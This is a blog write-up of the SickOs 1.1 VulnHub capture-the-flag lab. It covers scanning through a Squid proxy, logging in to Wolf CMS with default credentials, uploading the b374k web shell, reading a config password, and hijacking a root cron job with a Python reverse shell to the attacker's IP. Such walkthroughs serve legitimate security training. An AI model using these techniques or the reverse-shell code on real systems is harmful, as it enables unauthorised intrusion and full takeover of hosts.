SickOs1.1 Writeup

Here is a quick write up for SickOs.1.1 from the vulnhub.com site
https://www.vulnhub.com/entry/sickos-11,132/
Created by D4rk

Run a quick NMAP scan to see what we have to work with.
nmap -Pn 192.168.18.146

Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-08 06:35 PST
Nmap scan report for 192.168.18.146
Host is up (0.0044s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy

The squid proxy port looks interesting. So configure my browser to use the proxy. Once configured I am able to access the internet. Let try accessing the local IP through the proxy.

Ok not much to go on here looking at the source of the page show no clues.
Lets run a quick directory scan using dirb and see if anything interesting shows up.

dirb http://192.168.18.146 /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt -p 192.168.18.146:3128

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Tue Dec 8 07:12:14 2015
URL_BASE: http://192.168.18.146/
WORDLIST_FILES: /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt
PROXY: 192.168.18.146:3128

—————–

GENERATED WORDS: 4592

—- Scanning URL: http://192.168.18.146/ —-
+ http://192.168.18.146/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.18.146/connect (CODE:200|SIZE:109)
+ http://192.168.18.146/index (CODE:200|SIZE:21)
+ http://192.168.18.146/index.php (CODE:200|SIZE:21)
+ http://192.168.18.146/robots (CODE:200|SIZE:45)
+ http://192.168.18.146/robots.txt (CODE:200|SIZE:45)
+ http://192.168.18.146/server-status (CODE:403|SIZE:295)

—————–
END_TIME: Tue Dec 8 07:12:17 2015
DOWNLOADED: 4592 – FOUND: 7

check out robots

User-agent: *
Disallow: /
Dissalow: /wolfcms

/woldcms looks interesting opening in a browser shows.

I have never heard of wolfcms. Check out expoit-db and I see some vulnerabilities but most seem to require an authenticated user. So let download the source for wolfcms to see the file structure. From the source I see several directories such as images etc. Looking around those nothing exciting shows up. So we bring up the admin login page determined from the source code.

Just try the common admin/admin and we are in.

Now lets see if we can upload my preferred PHP shell b37k to get CLI access. Lets put it in the images directory

Now lets see if we can access the newly uploaded file.

We are now in as the www-data user. From the b37k I create a reverse shell back to my self to obtain shell access.

/tmp# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from [192.168.18.146] port 6666 [tcp/*] accepted (family 2, sport 33912)
b374k shell : connected
/bin/sh: 0: can’t access tty; job control turned off
/tmp>ls
b374k_rs
b374k_rs.c
/tmp>whoami
www-data
/tmp>uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
/tmp>

lets look at services and see if anything stands out.

/var/www>ps -aux
Warning: bad ps syntax, perhaps a bogus ‘-‘? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 3536 1892 ? Ss 20:30 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 20:30 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 20:30 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 20:30 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 20:30 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 20:30 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 20:30 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 20:30 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 20:30 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 20:30 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 20:30 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 20:30 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 20:30 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 20:30 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 20:30 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 20:30 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 20:30 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 20:30 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 20:30 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 20:30 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 20:30 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 20:30 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 20:30 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 20:30 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 20:30 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 20:30 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 20:30 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 20:30 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 20:30 0:00 [kthrotld]
root 45 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_1]
root 49 0.0 0.0 0 0 ? S< 20:30 0:00 [dm_bufio_cache]
root 69 0.0 0.0 0 0 ? S< 20:30 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 20:30 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 20:30 0:00 [kworker/0:2]
root 213 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_2]
root 214 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_3]
root 215 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_4]
root 217 0.0 0.0 0 0 ? S< 20:30 0:00 [mpt_poll_0]
root 222 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_5]
root 223 0.0 0.0 0 0 ? S< 20:30 0:00 [mpt/0]
root 224 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_6]
root 226 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_7]
root 228 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_8]
root 229 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_9]
root 230 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_10]
root 233 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_11]
root 234 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_12]
root 235 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_13]
root 236 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_14]
root 237 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_15]
root 238 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_16]
root 239 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_17]
root 240 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_18]
root 241 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_19]
root 242 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_20]
root 243 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_21]
root 244 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_22]
root 245 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_23]
root 246 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_24]
root 247 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_25]
root 248 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_26]
root 249 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_27]
root 250 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_28]
root 251 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_29]
root 252 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_30]
root 253 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_31]
root 283 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_32]
root 374 0.0 0.0 0 0 ? S 20:30 0:00 [jbd2/sda1-8]
root 375 0.0 0.0 0 0 ? S< 20:30 0:00 [ext4-rsv-conver]
root 376 0.0 0.0 0 0 ? S< 20:30 0:00 [ext4-unrsv-conv]
root 470 0.0 0.0 2832 608 ? S 20:30 0:00 upstart-udev-bridge –daemon
root 473 0.0 0.1 3100 1332 ? Ss 20:30 0:00 /sbin/udevd –daemon
102 559 0.0 0.0 3256 888 ? Ss 20:30 0:00 dbus-daemon –system –fork –activation=upstart
syslog 563 0.0 0.1 30164 1580 ? Sl 20:30 0:00 rsyslogd -c5
root 574 0.0 0.0 0 0 ? S< 20:30 0:00 [ttm_swap]
root 641 0.0 0.0 2976 764 ? S 20:30 0:00 /sbin/udevd –daemon
root 642 0.0 0.0 3096 880 ? S 20:30 0:00 /sbin/udevd –daemon
root 710 0.0 0.0 0 0 ? S< 20:30 0:00 [kpsmoused]
root 769 0.0 0.0 2844 348 ? S 20:30 0:00 upstart-socket-bridge –daemon
root 849 0.0 0.0 2924 404 ? Ss 20:30 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 895 0.0 0.2 6680 2408 ? Ss 20:30 0:00 /usr/sbin/sshd -D
root 1016 0.0 0.0 4628 844 tty4 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty4
root 1021 0.0 0.0 4628 844 tty5 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty5
root 1028 0.0 0.0 4628 844 tty2 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty2
root 1029 0.0 0.0 4628 848 tty3 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty3
root 1036 0.0 0.0 4628 856 tty6 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty6
proxy 1061 0.0 1.4 40200 15124 ? Ss 20:30 0:02 /usr/sbin/squid3 -N -YC -f /etc/squid3/squid.conf
root 1062 0.0 0.0 2172 624 ? Ss 20:30 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root 1063 0.0 0.0 2616 932 ? Ss 20:30 0:00 cron
daemon 1064 0.0 0.0 2468 352 ? Ss 20:30 0:00 atd
whoopsie 1084 0.0 0.3 24468 3768 ? Ssl 20:30 0:00 whoopsie
mysql 1107 0.0 3.3 326184 33976 ? Ssl 20:30 0:01 /usr/sbin/mysqld
proxy 1125 0.0 0.0 3220 612 ? Ss 20:30 0:00 (unlinkd)
root 1136 0.0 0.7 37900 7656 ? Ss 20:30 0:00 /usr/sbin/apache2 -k start
www-data 1172 0.0 0.7 38864 7776 ? S 20:30 0:00 /usr/sbin/apache2 -k start
www-data 1174 0.0 0.9 39804 10020 ? S 20:30 0:00 /usr/sbin/apache2 -k start
root 1185 0.0 0.0 4628 848 tty1 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty1
www-data 1379 0.0 0.9 40024 9548 ? S 20:43 0:00 /usr/sbin/apache2 -k start
www-data 1550 0.0 0.8 39768 9052 ? S 21:36 0:00 /usr/sbin/apache2 -k start
root 1554 0.0 0.0 0 0 ? S 21:37 0:00 [kworker/u16:1]
www-data 1596 0.0 0.9 40304 9656 ? S 21:48 0:00 /usr/sbin/apache2 -k start
www-data 1597 0.0 0.8 40412 8552 ? S 21:48 0:00 /usr/sbin/apache2 -k start
www-data 1602 0.0 0.9 40812 10188 ? S 21:48 0:00 /usr/sbin/apache2 -k start
www-data 1614 0.0 0.9 41964 10224 ? S 21:49 0:00 /usr/sbin/apache2 -k start
www-data 1615 0.0 1.0 41312 10532 ? S 21:49 0:00 /usr/sbin/apache2 -k start
www-data 1616 0.0 0.8 40412 8644 ? S 21:49 0:00 /usr/sbin/apache2 -k start
root 1666 0.0 0.0 0 0 ? S 21:55 0:00 [kworker/u16:0]
www-data 1690 0.0 0.0 2232 544 ? S 22:00 0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data 1691 0.0 0.0 2232 284 ? S 22:00 0:00 /bin/sh -i
root 1694 0.0 0.0 0 0 ? S 22:00 0:00 [kworker/u16:2]
www-data 1695 0.0 0.0 2232 540 ? S 22:00 0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data 1696 0.0 0.0 2232 280 ? S 22:00 0:00 /bin/sh -i
www-data 1767 0.0 0.0 2232 540 ? S 22:01 0:00 sh -c ./b374k_rs 13123 2>&1
www-data 1768 0.0 0.0 2000 284 ? S 22:01 0:00 ./b374k_rs 13123
www-data 1775 0.0 0.0 2232 544 ? S 22:03 0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data 1776 0.0 0.0 2232 560 ? S 22:03 0:00 /bin/sh -i
www-data 1790 0.0 0.1 2860 1044 ? R 22:05 0:00 ps -aux

woopsie looks odd.

Lets take a look at the wolfcms config file.
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’);
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);
define(‘TABLE_PREFIX’, ”);

Nice looking through the mysql tables nothing interesting pops out. Tried the root password via SSH with no luck. So lets look around a bit.

see a file in /var/www called connect.py
#!/usr/bin/python

print “I Try to connect things very frequently\n”
print “You may want to try my services”

Well that looks like a clue. Lets look for something that could launch this like cron.

found a file under /etc/cron.d called automate that runs the connect.py as root.

* * * * * root /usr/bin/python /var/www/connect.py
Lets edit the file to see if we can get a reverse shell via the root user.

Modified automate

#!/usr/bin/python

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“192.168.18.181”,1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,”-i”]);

now start nc listener

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Connection from [192.168.18.146] port 1234 [tcp/*] accepted (family 2, sport 34262)
/bin/sh: 0: can’t access tty; job control turned off
# # ls
a0216ea4d51874464078c618298b1367.txt
# whoami
root
# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

this was a lot of fun thanks for creating D4rk!

Posted on December 11, 2015, 3:39 pm By h1tch

Categories: Uncategorized

Recent Posts

Archives

Security Feed